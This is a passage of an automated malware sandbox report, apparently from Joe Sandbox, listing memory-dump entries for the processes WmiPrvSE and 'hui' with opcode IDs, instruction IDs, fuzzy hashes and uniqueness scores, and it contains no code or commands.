                                                • Source File: 00000009.00000002.1762669738.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_7ffd9baa0000_WmiPrvSE.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: =$F$W$]$u
                                                • API String ID: 0-4012747424
                                                • Opcode ID: aa1ea0139de949b0ca70375b7a447bda924428f3c422534495228e4f40276b67
                                                • Instruction ID: bdbc638af276974ae69f5a6f5700f3ddf226689b22a9ad5d3bf1fd466d8f345e
                                                • Opcode Fuzzy Hash: aa1ea0139de949b0ca70375b7a447bda924428f3c422534495228e4f40276b67
                                                • Instruction Fuzzy Hash: B641D670E0962D8FDBA8DF54D8A4BADB7B6FB54300F5041AAD40EA3290DB745E81CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1762669738.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_7ffd9baa0000_WmiPrvSE.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: '$($S$b${
                                                • API String ID: 0-809860253
                                                • Opcode ID: d02c19f9a1ce2670b592f872a7bdff58d8ed7b23a54d025aec5d2272a54e1b26
                                                • Instruction ID: aac094b1e41a279a53e8308ffefc35404850e98f3d3644f06a6c7875f32fe2cc
                                                • Opcode Fuzzy Hash: d02c19f9a1ce2670b592f872a7bdff58d8ed7b23a54d025aec5d2272a54e1b26
                                                • Instruction Fuzzy Hash: BD41A570E0966E8FDB68DF54C8A47ADB3B6FB54301F5101FAD00DA6291CBB86B818F51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1861331965.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7ffd9ba90000_hui.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 51ba5f90e98c9db90dd17b3ad14db0b9bd6e8d9cebbe22381dbcc3b56f6a7d77
                                                • Instruction ID: 54a2e880c96bd19dd5caeafaf0a47e5a16e636dfe7e75aab2bc40579d865f7f2
                                                • Opcode Fuzzy Hash: 51ba5f90e98c9db90dd17b3ad14db0b9bd6e8d9cebbe22381dbcc3b56f6a7d77
                                                • Instruction Fuzzy Hash: E872566284E7C94FD7138B748C756953FB0AF27214B0A45DBD4C4CF0B3E228AA5AD762
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1861331965.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7ffd9ba90000_hui.jbxd
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7ffd9ba90000_hui.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 006a6cb84ec753aa675a8f8111803d7e01c3867c28fa425323efe682e0087905
                                                • Instruction ID: 35b0f345f470dcd7c978c0f43ed1143d85f172beab075e167ef8bf0df0f71e2e
                                                • Opcode Fuzzy Hash: 006a6cb84ec753aa675a8f8111803d7e01c3867c28fa425323efe682e0087905
                                                • Instruction Fuzzy Hash: 4441D231A0E64D8FE7359BA488612EC7BB0FF46350F0601BAD05DD31E2DABC2A48DB01
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1861331965.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7ffd9ba90000_hui.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 353cfe29af569eddc52faff540f16b04444eca1b094bcc2ebc0208759898aeb7
                                                • Instruction ID: d7e86248d9360a872d6a42001b983cf80a244efe813dea47f8be265b2e1b46f1
                                                • Opcode Fuzzy Hash: 353cfe29af569eddc52faff540f16b04444eca1b094bcc2ebc0208759898aeb7
                                                • Instruction Fuzzy Hash: 3031D23194E7CD4FD7229B6488282E97FB0EF06310F0601EBD444CB2E2DA785A49D752
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1861331965.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7ffd9ba90000_hui.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5589ee4ab00c816108ca47ca8ca83d4afb57b52a1fc19f40b32bbe7bc22878ca
                                                • Instruction ID: 0962ae35f877ea14327ce0338536fa0199182006c7fd026a259f077ffb773777
                                                • Opcode Fuzzy Hash: 5589ee4ab00c816108ca47ca8ca83d4afb57b52a1fc19f40b32bbe7bc22878ca
                                                • Instruction Fuzzy Hash: B1413C30E0921E8FEB74DF54C8647A8B2B1EF18310F6142BAD41DE26A5DF786A819F40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1861331965.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7ffd9ba90000_hui.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0e0d3fd5be774761ed4ab48df5101b06a09bbd2242fd759540dc6ec4c43f3590
                                                • Instruction ID: eab678c3ec17303b1cac67560b29683bf65b175d71834c25210bfe9280a15211
                                                • Opcode Fuzzy Hash: 0e0d3fd5be774761ed4ab48df5101b06a09bbd2242fd759540dc6ec4c43f3590
                                                • Instruction Fuzzy Hash: EE41B770E0A52D8FEBA4DF54C864BA8B7B1EF54354F0141EAD00DE72A1DB746A84DF60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1861331965.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7ffd9ba90000_hui.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e08133ea52e33dfdfb697a4f1b5b5e4103e4306110e4946fd97ad937ca0747fe
                                                • Instruction ID: 2f9bf807c387028730a4569132973615daca473ef1950f0644d6ba4f5559bb9d
                                                • Opcode Fuzzy Hash: e08133ea52e33dfdfb697a4f1b5b5e4103e4306110e4946fd97ad937ca0747fe
                                                • Instruction Fuzzy Hash: 1631D471E0E68D8FEB65EF688865ABD3BE0EF55740F0500BBE45CC71A2DA786A40C704
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1861331965.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7ffd9ba90000_hui.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ae52a468b2b8ea2c70ad4822db737d802f514ad5b099fd41b6774aeab8944393
                                                • Instruction ID: 0161b9c6cd89584af5221a2bf5fdf0ed02e2758f70feeb8ef952dd5739769cc1
                                                • Opcode Fuzzy Hash: ae52a468b2b8ea2c70ad4822db737d802f514ad5b099fd41b6774aeab8944393
                                                • Instruction Fuzzy Hash: 7231E931A0E68E9FEB31EBA88C286FD7BA0EF15315F0501B7D419CA1E2DE786548D741
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1861331965.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7ffd9ba90000_hui.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5534871f5bc68d224e0f11050eaedd63eebaccdc8e65075805874b05d5e2a32b
                                                • Instruction ID: 6c0c099431472c8249c3b28a4f8fbee8e989daef1a1c25b11241d98c25b3b03c
                                                • Opcode Fuzzy Hash: 5534871f5bc68d224e0f11050eaedd63eebaccdc8e65075805874b05d5e2a32b
                                                • Instruction Fuzzy Hash: CB319770E0A52D8FEBA4DB58C894BE8B7B1FF58345F1141EAD40DE7291CA746A84DF10
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1861331965.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7ffd9ba90000_hui.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1225359caa4f8f5680c48e4448fe5b6de8f73f6dfee1d0ad08486f3c754a7fd3
                                                • Instruction ID: 615b904b1cbd113cf8ecec35551c4d5acbcd10b2f457c054f1bcac01f3f34a91
                                                • Opcode Fuzzy Hash: 1225359caa4f8f5680c48e4448fe5b6de8f73f6dfee1d0ad08486f3c754a7fd3
                                                • Instruction Fuzzy Hash: 5F313D30E0562D8FEBA4DB24C8687A9B6B1EF18314F5001FAD41DD32A6DE395AC18F40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1861331965.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7ffd9ba90000_hui.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 582fa4712058686f28f01930be033c7159752f4cbe70b2f9a4b963067707f957
                                                • Instruction ID: 65ecf454a07deed3918f53cc13e9dda7a5e78da729d6446b821043375e71d52c
                                                • Opcode Fuzzy Hash: 582fa4712058686f28f01930be033c7159752f4cbe70b2f9a4b963067707f957
                                                • Instruction Fuzzy Hash: 6F31EA70E0661D8EEBA4DF94C8647EDB7F0EF64354F1101BAD009E7291DAB86A81DF40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1861331965.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7ffd9ba90000_hui.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a489a0fef15d2cab7766f83ffd2cb7bcd873b17207cc2af8e1340b7e909858b2
                                                • Instruction ID: 57f28baf7ee21a223aef0271cfd636177bc49e9a3194e11bab52340a051b7a1f
                                                • Opcode Fuzzy Hash: a489a0fef15d2cab7766f83ffd2cb7bcd873b17207cc2af8e1340b7e909858b2
                                                • Instruction Fuzzy Hash: B121B031A1E68D8FEB65AF64C8286E977A0FF05700F01017AD448C71E1EBB86A84DB41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1861331965.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7ffd9ba90000_hui.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a38738f09a8d97267662fee6b7e6ef3ff6e6407e1e9dc332a7168dc3292c06ab
                                                • Instruction ID: b097320c237e3ace74c62984fed7fa42c453a08c7561fd98a4d7e7040435efd2
                                                • Opcode Fuzzy Hash: a38738f09a8d97267662fee6b7e6ef3ff6e6407e1e9dc332a7168dc3292c06ab
                                                • Instruction Fuzzy Hash: FE21A130A0E64D9FEB61DBA4C8686EE77A0FF05301F020176D409D62E1DF78A658DB41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1861331965.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7ffd9ba90000_hui.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a3338a86af1400c7a3f6e6baa6b6f8b6bcbd726c33e47decf2b9dd567533e9a2
                                                • Instruction ID: 32c8f9871a70705624abc0cc94da5785c2b002655d941526cdd5d1ee83878e8a
                                                • Opcode Fuzzy Hash: a3338a86af1400c7a3f6e6baa6b6f8b6bcbd726c33e47decf2b9dd567533e9a2
                                                • Instruction Fuzzy Hash: B0116038A0F3CE4FE726976089254A53F70AF43204F0A11F7D498870A7E96C2A1D9B92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1861331965.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7ffd9ba90000_hui.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bdadc955ba909925f7867585a5ab0321d46c2ed7e6af41890689f422d5105d82
                                                • Instruction ID: 39c940c9881867a036d08751b17e6c8bcf41c9df071fa8e29917f51fb6d97ff2
                                                • Opcode Fuzzy Hash: bdadc955ba909925f7867585a5ab0321d46c2ed7e6af41890689f422d5105d82
                                                • Instruction Fuzzy Hash: 6111D630E0991D8EEBA4EBE8C4A56FCB7F1FF58300F511139D00EE7292CE6469419B40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1861331965.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7ffd9ba90000_hui.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 12136ca2deb993b211a0f882c56d97dff2eee379b66ab8ca5e2cb9e05f7b45c8
                                                • Instruction ID: 97a0ddbaa27453e63e1ddcb8d7294bd7abcffb043e773f4b58f08693e7b6e8a2
                                                • Opcode Fuzzy Hash: 12136ca2deb993b211a0f882c56d97dff2eee379b66ab8ca5e2cb9e05f7b45c8
                                                • Instruction Fuzzy Hash: 5411C121A0E7CA6FE3125BA98C795E9BB70FF12214F0A41F7C098CA1E3DA196509D342
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1861331965.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7ffd9ba90000_hui.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 05a7f3252649861822d05ce1070f9ddff7f33b5992b675bb4d170a1b0d4c1639
                                                • Instruction ID: 211c879b64d06eaad20525d2be43e7ef612c2e0d31248f68c66247822ae28937
                                                • Opcode Fuzzy Hash: 05a7f3252649861822d05ce1070f9ddff7f33b5992b675bb4d170a1b0d4c1639
                                                • Instruction Fuzzy Hash: 5F114430E0951D9AEB58DB94C8642FCB7B1EF08300F51023AC01AA72A5DF682A41DB14
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1861331965.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7ffd9ba90000_hui.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 812a45312561c40698c3000f3cbeccf1b0e65073ae47cddc08962a76833b57df
                                                • Instruction ID: db441ba794cb9ddee7ed72b275c628d35bbb528be4604e2b115a6a8182fbcfd6
                                                • Opcode Fuzzy Hash: 812a45312561c40698c3000f3cbeccf1b0e65073ae47cddc08962a76833b57df
                                                • Instruction Fuzzy Hash: 5E110A71E0912E8FDB68DFE4D4646FDB6B1AF04715F10013ED01AB22D1CB782A44DB68
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1861331965.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7ffd9ba90000_hui.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ef16350dfdfd2c7c250f5a1507cd3ab8bea76a064eacc6725197cd61a50d5a29
                                                • Instruction ID: 61595968a37789fb80b5ccd9a9d2a5955dba2f63bdb27738a7b99cb1fefb9f6e
                                                • Opcode Fuzzy Hash: ef16350dfdfd2c7c250f5a1507cd3ab8bea76a064eacc6725197cd61a50d5a29
                                                • Instruction Fuzzy Hash: 3D115772E1991D8FDFA4EB9C8895AECB7F2FB68300F50416AC01DE3292DE3469419B40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1861331965.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7ffd9ba90000_hui.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4e5ac65f5ae246946028d35bae5074fa7604c555d52fb780e8abc1604976e219
                                                • Instruction ID: 86d0d3faef5323753cecc5948ad239e9abcdbded2d5271414e1b73c4dd44b067
                                                • Opcode Fuzzy Hash: 4e5ac65f5ae246946028d35bae5074fa7604c555d52fb780e8abc1604976e219
                                                • Instruction Fuzzy Hash: 58016931A0890E8EDB64EF98D424AEEBBA1EF58311F00013AE40DE2291DE7469508BE4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1861331965.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7ffd9ba90000_hui.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3a44519665ed696bbeedebbde5d4e052b0c17e0fae78eeb5bd5b484a5015e403
                                                • Instruction ID: 17f3306423b914f80b22ba1794b66eee60cb1b898f1225383cd5a6de1c9fe996
                                                • Opcode Fuzzy Hash: 3a44519665ed696bbeedebbde5d4e052b0c17e0fae78eeb5bd5b484a5015e403
                                                • Instruction Fuzzy Hash: C3014C3494E3C98FD7279B6088210E53F70AF47214F0642EBD4948B0A3EA6C5A59CB52
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1861331965.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7ffd9ba90000_hui.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 90ec98c5726f441661fe44286d7b759904aab7832852772a07b5cb7f470865cb
                                                • Instruction ID: ad1fc95e013d1cd8f3ab61a9525f5d0b48d8ab10a4099254431ebac867b3627a
                                                • Opcode Fuzzy Hash: 90ec98c5726f441661fe44286d7b759904aab7832852772a07b5cb7f470865cb
                                                • Instruction Fuzzy Hash: 1C01C86590F7CD4FD7669F2488651A93FA0FF12304F1A00FBE448860E7D674A948D341
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1861331965.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7ffd9ba90000_hui.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b25de50d56229ba6ca524b9d0aca5cdec66c77f2abcc3175319c7be9a1dc17b0
                                                • Instruction ID: 8cc46e5345c485e91c3f9cf013046e97bdedc8c0f059eb9cfb72ca89e15eb22d
                                                • Opcode Fuzzy Hash: b25de50d56229ba6ca524b9d0aca5cdec66c77f2abcc3175319c7be9a1dc17b0
                                                • Instruction Fuzzy Hash: A4010C31A0551D8FDBA4EF48C8A0AE8B3B1EF58354F5001B9D00AD7299CE746E91CB40
                                                Uniqueness

                                                • Opcode ID: 98c8f3aa484e177802384b682d6060ecdaf4bfb58654fd0986e93e712c85b31d
                                                • Instruction ID: f12e9b576d680e4bbd835093ffabe31f04cb17985f4fb7d08a41fecbc305843b
                                                • Opcode Fuzzy Hash: 98c8f3aa484e177802384b682d6060ecdaf4bfb58654fd0986e93e712c85b31d
                                                • Instruction Fuzzy Hash: C141B970E0A52D8FEBA4DF54C854BA8B7B1EF14315F5141EAD00DE72A1DB746A84CF20
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533487245.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_7ffd9baa0000_WmiPrvSE.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: adef00367fb61ce2769c88e50d2fbeb278870ccda84748b0b1d3b7100d4398c8
                                                • Instruction ID: 1fa83d8130aea681bea02b8d64df7769929fd2784630e5c72e3b89c5d104b906
                                                • Opcode Fuzzy Hash: adef00367fb61ce2769c88e50d2fbeb278870ccda84748b0b1d3b7100d4398c8
                                                • Instruction Fuzzy Hash: EC31E230E0E68D8FEB65EF6888646B97BA1EF16704F0500BBE44CC31E2DA746A408714
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533487245.00007FFD9BAA3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA3000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_7ffd9baa3000_WmiPrvSE.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ee8d52730b09a8644910a48b173cc458409339c200c024748279a4210bfbe803
                                                • Instruction ID: c1571a75ca10efd729d433cc7e9eb340aff0904df60241c8f5a2746ae794b211
                                                • Opcode Fuzzy Hash: ee8d52730b09a8644910a48b173cc458409339c200c024748279a4210bfbe803
                                                • Instruction Fuzzy Hash: FC31A970E0A52D8FEBA4DB58C894BA877B1FF68351F5141EAD40DE7291CB746A80CF20
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533487245.00007FFD9BAA3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA3000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_7ffd9baa3000_WmiPrvSE.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 34b93708dd456478019ebf56f78fbfa71c770f9d3761660c683659d925406975
                                                • Instruction ID: 90db4397a32aa3520b9fb308a0ef932fe621bb26a9ba5cfe4e5e8e1c463853fc
                                                • Opcode Fuzzy Hash: 34b93708dd456478019ebf56f78fbfa71c770f9d3761660c683659d925406975
                                                • Instruction Fuzzy Hash: F631E770E0661D8EEBA4DFA4C8647EDB7F1EF64310F5101BAD00DE7291DAB86A81CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533487245.00007FFD9BAA3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA3000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_7ffd9baa3000_WmiPrvSE.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4a2b0189ac92b3fe96b2054fad0de39f4bdcf1d241bbbd59c9561982e632faca
                                                • Instruction ID: 3b80617fc5e9f7cf0c3031e55a84733d8b416bbdb24510ae65ef9452f72d7866
                                                • Opcode Fuzzy Hash: 4a2b0189ac92b3fe96b2054fad0de39f4bdcf1d241bbbd59c9561982e632faca
                                                • Instruction Fuzzy Hash: 79310A70A0562D8FEBA4DB24C8587A9B6B1EF18311F5041FAD41DD22A6DE795AC1CF40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533487245.00007FFD9BAA3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA3000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_7ffd9baa3000_WmiPrvSE.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0fc85d0569976346a951d70801f8f94cd167a00f8f8b184c5963588e9b8f89df
                                                • Instruction ID: d5460547bfc2a5c9c949af48bfa010efcebdba0a3269d7e977bb75e07fd74f24
                                                • Opcode Fuzzy Hash: 0fc85d0569976346a951d70801f8f94cd167a00f8f8b184c5963588e9b8f89df
                                                • Instruction Fuzzy Hash: 62216A2188F3C95FDB2347B45C764E53FB49F03614B0A41E7E498CA4E3D85D168AC362
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533487245.00007FFD9BAA3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA3000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_7ffd9baa3000_WmiPrvSE.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a014380acf60306fdfecfdbe558e022218127bc7b928f06cef449815bb1077b5
                                                • Instruction ID: 5d027a0c9ff464bc3894caaa3880037610ed67f73f44c2d25b627ca2a5c66de1
                                                • Opcode Fuzzy Hash: a014380acf60306fdfecfdbe558e022218127bc7b928f06cef449815bb1077b5
                                                • Instruction Fuzzy Hash: 7A213071E0A25D8FEF65DFA5C4647ECB7B2FF48304F01417AD009A62A2DB785645CB21
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533487245.00007FFD9BAA3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA3000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_7ffd9baa3000_WmiPrvSE.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 01ed24c2bfe28583e8ba7d4fee79da1c5a818303420d3b7e72a69eb816c84507
                                                • Instruction ID: 75c7a61be383dc32497619772899551e49579d08d363b19e0b8ae0f5da73f04f
                                                • Opcode Fuzzy Hash: 01ed24c2bfe28583e8ba7d4fee79da1c5a818303420d3b7e72a69eb816c84507
                                                • Instruction Fuzzy Hash: 5B112C31D0F28F4BEB35A760C9310F43BA1FF45604F0A12BAD46D460A3F95C661E8AA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533487245.00007FFD9BAA3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA3000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_7ffd9baa3000_WmiPrvSE.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0a8821b45bda4288d39a8ce61748b3d3086cc2eed5433581b3493e16cbdf18a3
                                                • Instruction ID: a34ec9853198b6a8148e2dad99c8033e61f12d2c2a1f85f99ebce41a46abc36f
                                                • Opcode Fuzzy Hash: 0a8821b45bda4288d39a8ce61748b3d3086cc2eed5433581b3493e16cbdf18a3
                                                • Instruction Fuzzy Hash: E2217C30A0E64D8FEB35DB94C8216EDB7B2EF59310F5601BAC00DD72E2DA782A45CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533487245.00007FFD9BAA3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA3000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_7ffd9baa3000_WmiPrvSE.jbxd
                                                Similarity
                                                • API ID:
